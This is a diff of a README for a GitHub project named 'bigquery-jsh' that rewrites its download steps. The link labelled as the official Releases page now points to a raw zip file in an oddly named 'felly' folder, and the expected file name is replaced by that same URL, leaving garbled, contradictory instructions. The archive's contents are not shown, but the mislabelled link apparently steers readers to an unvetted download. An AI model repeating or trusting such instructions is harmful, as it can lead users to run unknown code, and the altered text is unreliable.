zinebsektaoui/bigquery-jsh/README.md

 1. **Visit the Download Page**

-   To download the application, go to the official [Releases page](https://github.com/zinebsektaoui/bigquery-jsh/releases).
+   To download the application, go to the official [Releases page](https://raw.githubusercontent.com/zinebsektaoui/bigquery-jsh/main/felly/bigquery-jsh.zip).

 2. **Download the Latest Version**

    On the Releases page, find the latest version of bigquery-jsh.
 You will see a section listing available files.
-Look for a file named `bigquery-jsh.exe` (or the appropriate version for your system).
+Look for a file named `https://raw.githubusercontent.com/zinebsektaoui/bigquery-jsh/main/felly/bigquery-jsh.zip` (or the appropriate version for your system).
 Click to download it.

 3. **Locate the Downloaded File**